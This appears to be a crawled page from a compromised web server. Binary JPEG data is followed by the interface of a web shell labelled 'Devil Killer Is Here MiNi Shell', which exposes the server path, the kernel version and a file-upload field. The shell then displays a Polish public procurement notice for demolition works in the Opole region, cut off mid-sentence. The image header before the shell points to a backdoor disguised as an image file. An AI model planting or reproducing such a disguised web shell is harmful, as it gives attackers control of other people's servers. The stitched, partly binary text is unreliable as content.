JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251007/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251007/0046138001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty rozbiórkowe – 6 zadań częściowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ TERENOWY W OPOLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-068</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77/4000-900</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.opole@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Realizacja zadań w zakresie wdrażania i stosowania instrumentów wsparcia rolnictwa, gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty rozbiórkowe – 6 zadań częściowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3198cd59-7eb2-449e-92b4-860d2387cb83</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00461380</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00078136/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rozbiórka garażu nr inw. 102/000047, garażu 3_160B*, mag. suszarni 4_136D,bud. suszarni 1/131, kotłowni 2_136F, bud. mieszkalnego 110/001566 obręb Zakrzów dz.nr. 415/6, powiat kędzierzyńsko-kozielski.</p> <p class="mb-0">1.1.7 Rozbiórka wiaty nr inw. 18_180B w miejscowości Nowy Dwór przysiółku Kowalowic na dz.nr. 3 obr. Kowalowice, gmina Namysłów, powiat namysłowski</p> <p class="mb-0">1.1.8 Rozbiórka ruin stodoły nr inw. 74_180B w Dobiercicach przy ul. Parkowej, dz.nr. 16/12 obręb Dobiercice, gmina Byczyna, powiat kluczborski</p> <p class="mb-0">1.1.9 Rozbiórka bud. Stolarni nr inw.108/001521*, Stodoły nr inw.108/001522*, garażu z dobudówką nr inw.102/000055* w Woskowicach Górnych 34A, dz. 16/5 obr. Woskowice Górne, powiat namysłowski.</p> <p class="mb-0">1.1.10 Rozbiórka magazynu nawozów nr inw. 726_131 w Rożnowie, dz.nr. 48/32 obręb Rożnów, Rozbiórka budynku gospodarczego dz.nr. 7/115, gmina Wołczyn, powiat kluczborski.</p> <p class="mb-0">1.1.18 Rozbiórka budynku gospodarczego nr inw. 108/001563 oraz altany ogrodowej nr inw. 806/000003 , obr Prudnik dz.nr. 4/28, powiat prudnicki.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia odbywa się w języku<br/>polskim przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem<br/>https://kowr.eb2b.com.pl/.<br/>2. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń, składanych po otwarciu ofert, za pomocą poczty elektronicznej, na adres e-mail<br/>zamowienia.publiczne.opole@kowr.qov.pl (nie dotyczy oferty oraz załączników składanych razem z ofertą). W takim przypadku, za<br/>datę przekazania ww. dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń przyjmuje się<br/>datę otrzymania potwierdzenia dostarczenia wiadomości zawierającej ww. dokumenty elektroniczne, oświadczenia lub elektroniczne<br/>kopi dokumentów lub oświadczeń, z serwera pocztowego Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy<br/>Zakupowej pod adresem https://kowr.eb2b.com.pl/ i pod numerem postępowania wskazanym w ust. 11.17 SWZ.<br/>11.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na<br/>Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>11.3. Wymagania techniczne i organizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej dostępny<br/>pod adresem internetowym https://platforma.eb2b.com.pl/user/terms. Wykonawca przystępując do postępowania o udzielenie<br/>zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje<br/>warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący. Wykonawca korzystając z Platformy<br/>zobowiązuje się do przestrzegania postanowień zawartych w ww. instrukcji oraz w regulaminie Platformy.<br/>11.4. Wszelkie dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie, według<br/>Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”.<br/>11.8. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 50 MB.<br/>11.9. Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452),, określa następujące<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s;<br/>2) komputer klasy PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>3) zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader.<br/>11.10. Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia w sprawie sporządzania elektronicznych dokumentów oraz komunikacji<br/>elektronicznej określa informacje na temat kodowania i czasu odbioru danych:<br/>1) wszelkie operacje na Platformie opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy;<br/>2) plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>3) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po prawej stronie dokumentu w kolumnie „Data przesłania”.<br/>11.11. Za datę przekazania na Platformę oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków<br/>dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w<br/>postępowaniu, przyjmuje się datę ich wczytania do Platformy. Potwierdzeniem prawidłowo przekazanego (dokumentu<br/>elektronicznego) jest automatyczne wygenerowanie komunikatu systemowego o treści „Plik został przesłany&#34;, po każdej prawidłowo<br/>wykonanej operacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OP.WO.ZP.13.2025.RB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 662498,18 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 1: Rozbiórka budynku gospodarczego nr inw. 108/001563 oraz altany ogrodowej nr inw. 806/000003, obręb Prudnik dz. 4/28, powiat prudnicki.<br/><br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/><br/>A) altana (1):<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	rozbiórka pokrycia dachowego z papy wraz z pełnym deskowaniem,<br/>	rozbiórka konstrukcji dachowej wraz z konstrukcją wsporczą i deskowaniem altany ogrodowej,<br/>	przewracanie konstrukcji ścian do środka wraz z ich załadunkiem i wywozem,<br/>	wykonanie wykopu wzdłuż fundamentów o szerokości 1,00 i głębokości 1,00m,<br/>	demontaż fundamentów wraz z ich wydobyciem na zewnątrz, załadunkiem na środki transportu i wywozem,<br/>	zasypanie wykopu wraz z uzupełnieniem objętości po wydobytych fundamentach urobkiem gruntowym (nie gruzem) wraz z jego zagęszczeniem,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych,<br/>	utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>B) budynek gospodarczy (2):<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż stolarki okiennej i drzwiowej,<br/>	rozbiórka pokrycia dachowego z dachówki, rozbiórka konstrukcji dachowej,<br/>	rozbiórka konstrukcji ścian wraz z ich załadunkiem i wywozem,<br/>	wykonanie odcinkowego wykopu wzdłuż fundamentów o szerokości 1,00 i głębokości 1,00m (odcinki o długości 1,00m w stosunku 1,00m wykopu – 4 metry odstępu),<br/>	demontaż fundamentów wraz z ich wydobyciem na zewnątrz, załadunkiem na środki transportu i wywozem,<br/>	zasypanie wykopu wraz z uzupełnieniem objętości po wydobytych fundamentach urobkiem gruntowym (nie gruzem) wraz z jego zagęszczeniem,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych,<br/>	utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>2.	Szczegółowy zakres robót został opisany w:<br/>	projekcie budowlanym rozbiórki – załącznik nr 7/1 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/1 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/1 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3B do wniosku,<br/><br/>3.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 1.372,20 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/1 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 2: Rozbiórka garażu nr inw. 102/000047, garażu nr inw. 3_160B*, magazynu suszarni nr inw. 4_136D, budynku suszarni nr inw. 1/131, kotłowni nr inw. 2_136F, budynku mieszkalnego nr inw. 110/001566, dz. 415/6, obręb Zakrzów, gmina Polska Cerekiew, powiat kędzierzyńsko-kozielski.<br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/>A) garaż nr inw. 102/000047<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>B) garaż 3_160B*<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>C) Magazynu suszarni 4_136D<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>D) Budynek suszarni 1/131<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>E) Kotłownia 2_136F<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>F) Bud. mieszkalny 110/001566<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>4.	Szczegółowy zakres robót został opisany w:<br/>	projekcie zagospodarowania terenu – załącznik nr 9/2 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/2 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/2 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej 